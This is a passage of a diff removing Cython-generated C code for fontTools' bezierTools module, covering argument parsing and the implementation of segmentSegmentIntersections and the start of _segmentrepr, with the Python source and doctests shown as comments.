Returns:\n A list of ``Intersection`` objects, each object having ``pt``, ``t1``\n and ``t2`` attributes containing the intersection point, time on first\n segment and time on second segment respectively.\n\n Examples::\n >>> curve1 = [ (10,100), (90,30), (40,140), (220,220) ]\n >>> curve2 = [ (5,150), (180,20), (80,250), (210,190) ]\n >>> intersections = segmentSegmentIntersections(curve1, curve2)\n >>> len(intersections)\n 3\n >>> intersections[0].pt\n (81.7831487395506, 
109.88904552375288)\n >>> curve3 = [ (100, 240), (30, 60), (210, 230), (160, 30) ]\n >>> line = [ (25, 260), (230, 20) ]\n >>> intersections = segmentSegmentIntersections(curve3, line)\n >>> len(intersections)\n 3\n >>> intersections[0].pt\n (84.9000930760723, 189.87306176459828)\n\n "); -static PyMethodDef __pyx_mdef_9fontTools_4misc_11bezierTools_89segmentSegmentIntersections = {"segmentSegmentIntersections", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_9fontTools_4misc_11bezierTools_89segmentSegmentIntersections, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_9fontTools_4misc_11bezierTools_88segmentSegmentIntersections}; -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_89segmentSegmentIntersections(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -) { - PyObject *__pyx_v_seg1 = 0; - PyObject *__pyx_v_seg2 = 0; - #if !CYTHON_METH_FASTCALL - CYTHON_UNUSED Py_ssize_t __pyx_nargs; - #endif - CYTHON_UNUSED PyObject *const *__pyx_kwvalues; - PyObject* values[2] = {0,0}; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - PyObject *__pyx_r = 0; - __Pyx_RefNannyDeclarations - __Pyx_RefNannySetupContext("segmentSegmentIntersections (wrapper)", 0); - #if !CYTHON_METH_FASTCALL - #if CYTHON_ASSUME_SAFE_MACROS - __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); - #else - __pyx_nargs = PyTuple_Size(__pyx_args); if (unlikely(__pyx_nargs < 0)) return NULL; - #endif - #endif - __pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); - { - PyObject **__pyx_pyargnames[] = {&__pyx_n_s_seg1,&__pyx_n_s_seg2,0}; - if (__pyx_kwds) { - Py_ssize_t kw_args; - switch (__pyx_nargs) { - case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - CYTHON_FALLTHROUGH; - case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - CYTHON_FALLTHROUGH; - case 0: break; - default: goto 
__pyx_L5_argtuple_error; - } - kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); - switch (__pyx_nargs) { - case 0: - if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_seg1)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[0]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 1401, __pyx_L3_error) - else goto __pyx_L5_argtuple_error; - CYTHON_FALLTHROUGH; - case 1: - if (likely((values[1] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_seg2)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[1]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 1401, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("segmentSegmentIntersections", 1, 2, 2, 1); __PYX_ERR(0, 1401, __pyx_L3_error) - } - } - if (unlikely(kw_args > 0)) { - const Py_ssize_t kwd_pos_args = __pyx_nargs; - if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "segmentSegmentIntersections") < 0)) __PYX_ERR(0, 1401, __pyx_L3_error) - } - } else if (unlikely(__pyx_nargs != 2)) { - goto __pyx_L5_argtuple_error; - } else { - values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - } - __pyx_v_seg1 = values[0]; - __pyx_v_seg2 = values[1]; - } - goto __pyx_L6_skip; - __pyx_L5_argtuple_error:; - __Pyx_RaiseArgtupleInvalid("segmentSegmentIntersections", 1, 2, 2, __pyx_nargs); __PYX_ERR(0, 1401, __pyx_L3_error) - __pyx_L6_skip:; - goto __pyx_L4_argument_unpacking_done; - __pyx_L3_error:; - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_AddTraceback("fontTools.misc.bezierTools.segmentSegmentIntersections", __pyx_clineno, __pyx_lineno, __pyx_filename); - __Pyx_RefNannyFinishContext(); - return NULL; - __pyx_L4_argument_unpacking_done:; - __pyx_r = 
__pyx_pf_9fontTools_4misc_11bezierTools_88segmentSegmentIntersections(__pyx_self, __pyx_v_seg1, __pyx_v_seg2); - - /* function exit code */ - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_88segmentSegmentIntersections(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_seg1, PyObject *__pyx_v_seg2) { - int __pyx_v_swapped; - PyObject *__pyx_v_intersections = NULL; - PyObject *__pyx_8genexpr8__pyx_v_i = NULL; - PyObject *__pyx_r = NULL; - __Pyx_RefNannyDeclarations - Py_ssize_t __pyx_t_1; - Py_ssize_t __pyx_t_2; - int __pyx_t_3; - PyObject *__pyx_t_4 = NULL; - PyObject *__pyx_t_5 = NULL; - PyObject *__pyx_t_6 = NULL; - PyObject *__pyx_t_7 = NULL; - PyObject *__pyx_t_8 = NULL; - int __pyx_t_9; - int __pyx_t_10; - PyObject *__pyx_t_11 = NULL; - PyObject *(*__pyx_t_12)(PyObject *); - PyObject *__pyx_t_13 = NULL; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - __Pyx_RefNannySetupContext("segmentSegmentIntersections", 0); - __Pyx_INCREF(__pyx_v_seg1); - __Pyx_INCREF(__pyx_v_seg2); - - /* "fontTools/misc/bezierTools.py":1431 - * """ - * # Arrange by degree - * swapped = False # <<<<<<<<<<<<<< - * if len(seg2) > len(seg1): - * seg2, seg1 = seg1, seg2 - */ - __pyx_v_swapped = 0; - - /* "fontTools/misc/bezierTools.py":1432 - * # Arrange by degree - * swapped = False - * if len(seg2) > len(seg1): # <<<<<<<<<<<<<< - * seg2, seg1 = seg1, seg2 - * swapped = True - */ - __pyx_t_1 = PyObject_Length(__pyx_v_seg2); if (unlikely(__pyx_t_1 == ((Py_ssize_t)-1))) __PYX_ERR(0, 1432, __pyx_L1_error) - __pyx_t_2 = PyObject_Length(__pyx_v_seg1); if (unlikely(__pyx_t_2 == ((Py_ssize_t)-1))) __PYX_ERR(0, 1432, __pyx_L1_error) - __pyx_t_3 = (__pyx_t_1 > __pyx_t_2); - if (__pyx_t_3) { - - /* 
"fontTools/misc/bezierTools.py":1433 - * swapped = False - * if len(seg2) > len(seg1): - * seg2, seg1 = seg1, seg2 # <<<<<<<<<<<<<< - * swapped = True - * if len(seg1) > 2: - */ - __pyx_t_4 = __pyx_v_seg1; - __pyx_t_5 = __pyx_v_seg2; - __pyx_v_seg2 = __pyx_t_4; - __pyx_t_4 = 0; - __pyx_v_seg1 = __pyx_t_5; - __pyx_t_5 = 0; - - /* "fontTools/misc/bezierTools.py":1434 - * if len(seg2) > len(seg1): - * seg2, seg1 = seg1, seg2 - * swapped = True # <<<<<<<<<<<<<< - * if len(seg1) > 2: - * if len(seg2) > 2: - */ - __pyx_v_swapped = 1; - - /* "fontTools/misc/bezierTools.py":1432 - * # Arrange by degree - * swapped = False - * if len(seg2) > len(seg1): # <<<<<<<<<<<<<< - * seg2, seg1 = seg1, seg2 - * swapped = True - */ - } - - /* "fontTools/misc/bezierTools.py":1435 - * seg2, seg1 = seg1, seg2 - * swapped = True - * if len(seg1) > 2: # <<<<<<<<<<<<<< - * if len(seg2) > 2: - * intersections = curveCurveIntersections(seg1, seg2) - */ - __pyx_t_2 = PyObject_Length(__pyx_v_seg1); if (unlikely(__pyx_t_2 == ((Py_ssize_t)-1))) __PYX_ERR(0, 1435, __pyx_L1_error) - __pyx_t_3 = (__pyx_t_2 > 2); - if (__pyx_t_3) { - - /* "fontTools/misc/bezierTools.py":1436 - * swapped = True - * if len(seg1) > 2: - * if len(seg2) > 2: # <<<<<<<<<<<<<< - * intersections = curveCurveIntersections(seg1, seg2) - * else: - */ - __pyx_t_2 = PyObject_Length(__pyx_v_seg2); if (unlikely(__pyx_t_2 == ((Py_ssize_t)-1))) __PYX_ERR(0, 1436, __pyx_L1_error) - __pyx_t_3 = (__pyx_t_2 > 2); - if (__pyx_t_3) { - - /* "fontTools/misc/bezierTools.py":1437 - * if len(seg1) > 2: - * if len(seg2) > 2: - * intersections = curveCurveIntersections(seg1, seg2) # <<<<<<<<<<<<<< - * else: - * intersections = curveLineIntersections(seg1, seg2) - */ - __Pyx_GetModuleGlobalName(__pyx_t_7, __pyx_n_s_curveCurveIntersections); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 1437, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_7); - __pyx_t_8 = NULL; - __pyx_t_9 = 0; - #if CYTHON_UNPACK_METHODS - if (unlikely(PyMethod_Check(__pyx_t_7))) { - __pyx_t_8 
= PyMethod_GET_SELF(__pyx_t_7); - if (likely(__pyx_t_8)) { - PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_7); - __Pyx_INCREF(__pyx_t_8); - __Pyx_INCREF(function); - __Pyx_DECREF_SET(__pyx_t_7, function); - __pyx_t_9 = 1; - } - } - #endif - { - PyObject *__pyx_callargs[3] = {__pyx_t_8, __pyx_v_seg1, __pyx_v_seg2}; - __pyx_t_6 = __Pyx_PyObject_FastCall(__pyx_t_7, __pyx_callargs+1-__pyx_t_9, 2+__pyx_t_9); - __Pyx_XDECREF(__pyx_t_8); __pyx_t_8 = 0; - if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 1437, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_6); - __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; - } - __pyx_v_intersections = __pyx_t_6; - __pyx_t_6 = 0; - - /* "fontTools/misc/bezierTools.py":1436 - * swapped = True - * if len(seg1) > 2: - * if len(seg2) > 2: # <<<<<<<<<<<<<< - * intersections = curveCurveIntersections(seg1, seg2) - * else: - */ - goto __pyx_L5; - } - - /* "fontTools/misc/bezierTools.py":1439 - * intersections = curveCurveIntersections(seg1, seg2) - * else: - * intersections = curveLineIntersections(seg1, seg2) # <<<<<<<<<<<<<< - * elif len(seg1) == 2 and len(seg2) == 2: - * intersections = lineLineIntersections(*seg1, *seg2) - */ - /*else*/ { - __Pyx_GetModuleGlobalName(__pyx_t_7, __pyx_n_s_curveLineIntersections); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 1439, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_7); - __pyx_t_8 = NULL; - __pyx_t_9 = 0; - #if CYTHON_UNPACK_METHODS - if (unlikely(PyMethod_Check(__pyx_t_7))) { - __pyx_t_8 = PyMethod_GET_SELF(__pyx_t_7); - if (likely(__pyx_t_8)) { - PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_7); - __Pyx_INCREF(__pyx_t_8); - __Pyx_INCREF(function); - __Pyx_DECREF_SET(__pyx_t_7, function); - __pyx_t_9 = 1; - } - } - #endif - { - PyObject *__pyx_callargs[3] = {__pyx_t_8, __pyx_v_seg1, __pyx_v_seg2}; - __pyx_t_6 = __Pyx_PyObject_FastCall(__pyx_t_7, __pyx_callargs+1-__pyx_t_9, 2+__pyx_t_9); - __Pyx_XDECREF(__pyx_t_8); __pyx_t_8 = 0; - if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 1439, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_6); - 
__Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; - } - __pyx_v_intersections = __pyx_t_6; - __pyx_t_6 = 0; - } - __pyx_L5:; - - /* "fontTools/misc/bezierTools.py":1435 - * seg2, seg1 = seg1, seg2 - * swapped = True - * if len(seg1) > 2: # <<<<<<<<<<<<<< - * if len(seg2) > 2: - * intersections = curveCurveIntersections(seg1, seg2) - */ - goto __pyx_L4; - } - - /* "fontTools/misc/bezierTools.py":1440 - * else: - * intersections = curveLineIntersections(seg1, seg2) - * elif len(seg1) == 2 and len(seg2) == 2: # <<<<<<<<<<<<<< - * intersections = lineLineIntersections(*seg1, *seg2) - * else: - */ - __pyx_t_2 = PyObject_Length(__pyx_v_seg1); if (unlikely(__pyx_t_2 == ((Py_ssize_t)-1))) __PYX_ERR(0, 1440, __pyx_L1_error) - __pyx_t_10 = (__pyx_t_2 == 2); - if (__pyx_t_10) { - } else { - __pyx_t_3 = __pyx_t_10; - goto __pyx_L6_bool_binop_done; - } - __pyx_t_2 = PyObject_Length(__pyx_v_seg2); if (unlikely(__pyx_t_2 == ((Py_ssize_t)-1))) __PYX_ERR(0, 1440, __pyx_L1_error) - __pyx_t_10 = (__pyx_t_2 == 2); - __pyx_t_3 = __pyx_t_10; - __pyx_L6_bool_binop_done:; - if (likely(__pyx_t_3)) { - - /* "fontTools/misc/bezierTools.py":1441 - * intersections = curveLineIntersections(seg1, seg2) - * elif len(seg1) == 2 and len(seg2) == 2: - * intersections = lineLineIntersections(*seg1, *seg2) # <<<<<<<<<<<<<< - * else: - * raise ValueError("Couldn't work out which intersection function to use") - */ - __Pyx_GetModuleGlobalName(__pyx_t_6, __pyx_n_s_lineLineIntersections); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 1441, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_6); - __pyx_t_7 = __Pyx_PySequence_Tuple(__pyx_v_seg1); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 1441, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_7); - __pyx_t_8 = __Pyx_PySequence_Tuple(__pyx_v_seg2); if (unlikely(!__pyx_t_8)) __PYX_ERR(0, 1441, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_8); - __pyx_t_11 = PyNumber_Add(__pyx_t_7, __pyx_t_8); if (unlikely(!__pyx_t_11)) __PYX_ERR(0, 1441, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_11); - __Pyx_DECREF(__pyx_t_7); 
__pyx_t_7 = 0; - __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; - __pyx_t_8 = __Pyx_PyObject_Call(__pyx_t_6, __pyx_t_11, NULL); if (unlikely(!__pyx_t_8)) __PYX_ERR(0, 1441, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_8); - __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; - __Pyx_DECREF(__pyx_t_11); __pyx_t_11 = 0; - __pyx_v_intersections = __pyx_t_8; - __pyx_t_8 = 0; - - /* "fontTools/misc/bezierTools.py":1440 - * else: - * intersections = curveLineIntersections(seg1, seg2) - * elif len(seg1) == 2 and len(seg2) == 2: # <<<<<<<<<<<<<< - * intersections = lineLineIntersections(*seg1, *seg2) - * else: - */ - goto __pyx_L4; - } - - /* "fontTools/misc/bezierTools.py":1443 - * intersections = lineLineIntersections(*seg1, *seg2) - * else: - * raise ValueError("Couldn't work out which intersection function to use") # <<<<<<<<<<<<<< - * if not swapped: - * return intersections - */ - /*else*/ { - __pyx_t_8 = __Pyx_PyObject_Call(__pyx_builtin_ValueError, __pyx_tuple__8, NULL); if (unlikely(!__pyx_t_8)) __PYX_ERR(0, 1443, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_8); - __Pyx_Raise(__pyx_t_8, 0, 0, 0); - __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; - __PYX_ERR(0, 1443, __pyx_L1_error) - } - __pyx_L4:; - - /* "fontTools/misc/bezierTools.py":1444 - * else: - * raise ValueError("Couldn't work out which intersection function to use") - * if not swapped: # <<<<<<<<<<<<<< - * return intersections - * return [Intersection(pt=i.pt, t1=i.t2, t2=i.t1) for i in intersections] - */ - __pyx_t_3 = (!__pyx_v_swapped); - if (__pyx_t_3) { - - /* "fontTools/misc/bezierTools.py":1445 - * raise ValueError("Couldn't work out which intersection function to use") - * if not swapped: - * return intersections # <<<<<<<<<<<<<< - * return [Intersection(pt=i.pt, t1=i.t2, t2=i.t1) for i in intersections] - * - */ - __Pyx_XDECREF(__pyx_r); - __Pyx_INCREF(__pyx_v_intersections); - __pyx_r = __pyx_v_intersections; - goto __pyx_L0; - - /* "fontTools/misc/bezierTools.py":1444 - * else: - * raise ValueError("Couldn't work out which 
intersection function to use") - * if not swapped: # <<<<<<<<<<<<<< - * return intersections - * return [Intersection(pt=i.pt, t1=i.t2, t2=i.t1) for i in intersections] - */ - } - - /* "fontTools/misc/bezierTools.py":1446 - * if not swapped: - * return intersections - * return [Intersection(pt=i.pt, t1=i.t2, t2=i.t1) for i in intersections] # <<<<<<<<<<<<<< - * - * - */ - __Pyx_XDECREF(__pyx_r); - { /* enter inner scope */ - __pyx_t_8 = PyList_New(0); if (unlikely(!__pyx_t_8)) __PYX_ERR(0, 1446, __pyx_L11_error) - __Pyx_GOTREF(__pyx_t_8); - if (likely(PyList_CheckExact(__pyx_v_intersections)) || PyTuple_CheckExact(__pyx_v_intersections)) { - __pyx_t_11 = __pyx_v_intersections; __Pyx_INCREF(__pyx_t_11); - __pyx_t_2 = 0; - __pyx_t_12 = NULL; - } else { - __pyx_t_2 = -1; __pyx_t_11 = PyObject_GetIter(__pyx_v_intersections); if (unlikely(!__pyx_t_11)) __PYX_ERR(0, 1446, __pyx_L11_error) - __Pyx_GOTREF(__pyx_t_11); - __pyx_t_12 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_11); if (unlikely(!__pyx_t_12)) __PYX_ERR(0, 1446, __pyx_L11_error) - } - for (;;) { - if (likely(!__pyx_t_12)) { - if (likely(PyList_CheckExact(__pyx_t_11))) { - { - Py_ssize_t __pyx_temp = __Pyx_PyList_GET_SIZE(__pyx_t_11); - #if !CYTHON_ASSUME_SAFE_MACROS - if (unlikely((__pyx_temp < 0))) __PYX_ERR(0, 1446, __pyx_L11_error) - #endif - if (__pyx_t_2 >= __pyx_temp) break; - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - __pyx_t_6 = PyList_GET_ITEM(__pyx_t_11, __pyx_t_2); __Pyx_INCREF(__pyx_t_6); __pyx_t_2++; if (unlikely((0 < 0))) __PYX_ERR(0, 1446, __pyx_L11_error) - #else - __pyx_t_6 = __Pyx_PySequence_ITEM(__pyx_t_11, __pyx_t_2); __pyx_t_2++; if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 1446, __pyx_L11_error) - __Pyx_GOTREF(__pyx_t_6); - #endif - } else { - { - Py_ssize_t __pyx_temp = __Pyx_PyTuple_GET_SIZE(__pyx_t_11); - #if !CYTHON_ASSUME_SAFE_MACROS - if (unlikely((__pyx_temp < 0))) __PYX_ERR(0, 1446, __pyx_L11_error) - #endif - if (__pyx_t_2 >= __pyx_temp) break; - } - #if 
CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - __pyx_t_6 = PyTuple_GET_ITEM(__pyx_t_11, __pyx_t_2); __Pyx_INCREF(__pyx_t_6); __pyx_t_2++; if (unlikely((0 < 0))) __PYX_ERR(0, 1446, __pyx_L11_error) - #else - __pyx_t_6 = __Pyx_PySequence_ITEM(__pyx_t_11, __pyx_t_2); __pyx_t_2++; if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 1446, __pyx_L11_error) - __Pyx_GOTREF(__pyx_t_6); - #endif - } - } else { - __pyx_t_6 = __pyx_t_12(__pyx_t_11); - if (unlikely(!__pyx_t_6)) { - PyObject* exc_type = PyErr_Occurred(); - if (exc_type) { - if (likely(__Pyx_PyErr_GivenExceptionMatches(exc_type, PyExc_StopIteration))) PyErr_Clear(); - else __PYX_ERR(0, 1446, __pyx_L11_error) - } - break; - } - __Pyx_GOTREF(__pyx_t_6); - } - __Pyx_XDECREF_SET(__pyx_8genexpr8__pyx_v_i, __pyx_t_6); - __pyx_t_6 = 0; - __Pyx_GetModuleGlobalName(__pyx_t_6, __pyx_n_s_Intersection); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 1446, __pyx_L11_error) - __Pyx_GOTREF(__pyx_t_6); - __pyx_t_7 = __Pyx_PyDict_NewPresized(3); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 1446, __pyx_L11_error) - __Pyx_GOTREF(__pyx_t_7); - __pyx_t_13 = __Pyx_PyObject_GetAttrStr(__pyx_8genexpr8__pyx_v_i, __pyx_n_s_pt); if (unlikely(!__pyx_t_13)) __PYX_ERR(0, 1446, __pyx_L11_error) - __Pyx_GOTREF(__pyx_t_13); - if (PyDict_SetItem(__pyx_t_7, __pyx_n_s_pt, __pyx_t_13) < 0) __PYX_ERR(0, 1446, __pyx_L11_error) - __Pyx_DECREF(__pyx_t_13); __pyx_t_13 = 0; - __pyx_t_13 = __Pyx_PyObject_GetAttrStr(__pyx_8genexpr8__pyx_v_i, __pyx_n_s_t2); if (unlikely(!__pyx_t_13)) __PYX_ERR(0, 1446, __pyx_L11_error) - __Pyx_GOTREF(__pyx_t_13); - if (PyDict_SetItem(__pyx_t_7, __pyx_n_s_t1, __pyx_t_13) < 0) __PYX_ERR(0, 1446, __pyx_L11_error) - __Pyx_DECREF(__pyx_t_13); __pyx_t_13 = 0; - __pyx_t_13 = __Pyx_PyObject_GetAttrStr(__pyx_8genexpr8__pyx_v_i, __pyx_n_s_t1); if (unlikely(!__pyx_t_13)) __PYX_ERR(0, 1446, __pyx_L11_error) - __Pyx_GOTREF(__pyx_t_13); - if (PyDict_SetItem(__pyx_t_7, __pyx_n_s_t2, __pyx_t_13) < 0) __PYX_ERR(0, 1446, __pyx_L11_error) - 
__Pyx_DECREF(__pyx_t_13); __pyx_t_13 = 0; - __pyx_t_13 = __Pyx_PyObject_Call(__pyx_t_6, __pyx_empty_tuple, __pyx_t_7); if (unlikely(!__pyx_t_13)) __PYX_ERR(0, 1446, __pyx_L11_error) - __Pyx_GOTREF(__pyx_t_13); - __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; - __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; - if (unlikely(__Pyx_ListComp_Append(__pyx_t_8, (PyObject*)__pyx_t_13))) __PYX_ERR(0, 1446, __pyx_L11_error) - __Pyx_DECREF(__pyx_t_13); __pyx_t_13 = 0; - } - __Pyx_DECREF(__pyx_t_11); __pyx_t_11 = 0; - __Pyx_XDECREF(__pyx_8genexpr8__pyx_v_i); __pyx_8genexpr8__pyx_v_i = 0; - goto __pyx_L15_exit_scope; - __pyx_L11_error:; - __Pyx_XDECREF(__pyx_8genexpr8__pyx_v_i); __pyx_8genexpr8__pyx_v_i = 0; - goto __pyx_L1_error; - __pyx_L15_exit_scope:; - } /* exit inner scope */ - __pyx_r = __pyx_t_8; - __pyx_t_8 = 0; - goto __pyx_L0; - - /* "fontTools/misc/bezierTools.py":1401 - * - * - * def segmentSegmentIntersections(seg1, seg2): # <<<<<<<<<<<<<< - * """Finds intersections between two segments. - * - */ - - /* function exit code */ - __pyx_L1_error:; - __Pyx_XDECREF(__pyx_t_6); - __Pyx_XDECREF(__pyx_t_7); - __Pyx_XDECREF(__pyx_t_8); - __Pyx_XDECREF(__pyx_t_11); - __Pyx_XDECREF(__pyx_t_13); - __Pyx_AddTraceback("fontTools.misc.bezierTools.segmentSegmentIntersections", __pyx_clineno, __pyx_lineno, __pyx_filename); - __pyx_r = NULL; - __pyx_L0:; - __Pyx_XDECREF(__pyx_v_intersections); - __Pyx_XDECREF(__pyx_8genexpr8__pyx_v_i); - __Pyx_XDECREF(__pyx_v_seg1); - __Pyx_XDECREF(__pyx_v_seg2); - __Pyx_XGIVEREF(__pyx_r); - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -/* "fontTools/misc/bezierTools.py":1449 - * - * - * def _segmentrepr(obj): # <<<<<<<<<<<<<< - * """ - * >>> _segmentrepr([1, [2, 3], [], [[2, [3, 4], [0.1, 2.2]]]]) - */ - -/* Python wrapper */ -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_91_segmentrepr(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, 
PyObject *__pyx_kwds -#endif -); /*proto*/ -PyDoc_STRVAR(__pyx_doc_9fontTools_4misc_11bezierTools_90_segmentrepr, "_segmentrepr(obj)\n\n >>> _segmentrepr([1, [2, 3], [], [[2, [3, 4], [0.1, 2.2]]]])\n '(1, (2, 3), (), ((2, (3, 4), (0.1, 2.2))))'\n "); -static PyMethodDef __pyx_mdef_9fontTools_4misc_11bezierTools_91_segmentrepr = {"_segmentrepr", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_9fontTools_4misc_11bezierTools_91_segmentrepr, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_9fontTools_4misc_11bezierTools_90_segmentrepr}; -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_91_segmentrepr(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -) { - PyObject *__pyx_v_obj = 0; - #if !CYTHON_METH_FASTCALL - CYTHON_UNUSED Py_ssize_t __pyx_nargs; - #endif - CYTHON_UNUSED PyObject *const *__pyx_kwvalues; - PyObject* values[1] = {0}; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - PyObject *__pyx_r = 0; - __Pyx_RefNannyDeclarations - __Pyx_RefNannySetupContext("_segmentrepr (wrapper)", 0); - #if !CYTHON_METH_FASTCALL - #if CYTHON_ASSUME_SAFE_MACROS - __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); - #else - __pyx_nargs = PyTuple_Size(__pyx_args); if (unlikely(__pyx_nargs < 0)) return NULL; - #endif - #endif - __pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); - { - PyObject **__pyx_pyargnames[] = {&__pyx_n_s_obj,0}; - if (__pyx_kwds) { - Py_ssize_t kw_args; - switch (__pyx_nargs) { - case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - CYTHON_FALLTHROUGH; - case 0: break; - default: goto __pyx_L5_argtuple_error; - } - kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); - switch (__pyx_nargs) { - case 0: - if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_obj)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[0]); - 
kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 1449, __pyx_L3_error) - else goto __pyx_L5_argtuple_error; - } - if (unlikely(kw_args > 0)) { - const Py_ssize_t kwd_pos_args = __pyx_nargs; - if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "_segmentrepr") < 0)) __PYX_ERR(0, 1449, __pyx_L3_error) - } - } else if (unlikely(__pyx_nargs != 1)) { - goto __pyx_L5_argtuple_error; - } else { - values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - } - __pyx_v_obj = values[0]; - } - goto __pyx_L6_skip; - __pyx_L5_argtuple_error:; - __Pyx_RaiseArgtupleInvalid("_segmentrepr", 1, 1, 1, __pyx_nargs); __PYX_ERR(0, 1449, __pyx_L3_error) - __pyx_L6_skip:; - goto __pyx_L4_argument_unpacking_done; - __pyx_L3_error:; - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_AddTraceback("fontTools.misc.bezierTools._segmentrepr", __pyx_clineno, __pyx_lineno, __pyx_filename); - __Pyx_RefNannyFinishContext(); - return NULL; - __pyx_L4_argument_unpacking_done:; - __pyx_r = __pyx_pf_9fontTools_4misc_11bezierTools_90_segmentrepr(__pyx_self, __pyx_v_obj); - - /* function exit code */ - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} -static PyObject *__pyx_gb_9fontTools_4misc_11bezierTools_12_segmentrepr_2generator5(__pyx_CoroutineObject *__pyx_generator, CYTHON_UNUSED PyThreadState *__pyx_tstate, PyObject *__pyx_sent_value); /* proto */ - -/* 